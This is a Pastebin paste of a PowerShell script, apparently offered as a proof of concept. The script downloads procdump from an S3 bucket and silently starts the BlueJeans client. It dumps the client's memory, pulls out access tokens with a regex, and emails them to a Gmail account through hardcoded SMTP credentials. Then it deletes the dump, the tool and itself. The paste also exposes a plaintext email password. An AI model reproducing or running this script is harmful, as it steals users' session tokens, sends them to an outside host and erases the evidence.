Advertisement
allwinfernandez

powerhell

Jan 2nd, 2018
448
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #https://s3.amazonaws.com/wifi101/procdump.exe
  2. $Client = New-Object System.Net.WebClient
  3. Start-Sleep -m 2000
  4. $Client.DownloadFile('https://s3.amazonaws.com/wifi101/procdump.exe', "$Env:USERPROFILE\Documents\procdump.exe")
  5. Start-Sleep -m 2000
  6. Start-Process "$Env:USERPROFILE\AppData\Local\BlueJeans\BlueJeans.exe" -WorkingDirectory "$Env:USERPROFILE\Documents\" -WindowStyle Hidden
  7. Start-Sleep -m 8000
  8. $app = "$Env:USERPROFILE\Documents\procdump.exe"
  9. $programid="BlueJeans.exe"
  10. $argument1 = '-ma'
  11. $argument2 = "$Env:USERPROFILE\Documents\"
  12. $argument3='-accepteula'
  13. $argument4='-o'
  14. $argument5="$Env:USERPROFILE\Documents\bluejeans.dmp"
  15. & $app $argument1 $programid $argument3 $argument4 $argument5
  16. $input_path = "$Env:USERPROFILE\Documents\bluejeans.dmp"
  17. $output_file = "$Env:USERPROFILE\Documents\hack.txt"
  18. $regex ='\baccess_token\=(.*)\b'
  19. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
  20. $smtpClient = new-object system.net.mail.smtpClient
  21. $smtpClient.Host = 'smtp.gmail.com'
  22. $smtpClient.Port = 587
  23. $smtpClient.EnableSsl = $true
  24. $SMTPClient.Credentials = New-Object System.Net.NetworkCredential("allwindaniel007@gmail.com", "Lenovo@345");
  25. $emailfrom = "allwindaniel007@gmail.com"
  26. $emailto = "allwindaniel007@gmail.com"
  27. $subject = "Bluejeans Acces Tokens"
  28. $body = "Captured Acces Tokens - POC"
  29. $emailMessage = New-Object System.Net.Mail.MailMessage
  30. $emailMessage.From = $EmailFrom
  31. $emailMessage.To.Add($EmailTo)
  32. $emailMessage.Subject = $Subject
  33. $emailMessage.Body = $Body
  34. $emailMessage.Attachments.Add("$Env:USERPROFILE\Documents\hack.txt")
  35. $SMTPClient.Send($emailMessage)
  36. Start-Sleep -m 3000
  37. Stop-Process -processname BlueJeans
  38. Start-Sleep -m 8000
  39. Remove-Item "$Env:USERPROFILE\Documents\hack.txt","$Env:USERPROFILE\Documents\bluejeans.dmp","$Env:USERPROFILE\Documents\procdump.exe","$Env:USERPROFILE\Documents\hack.ps1"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement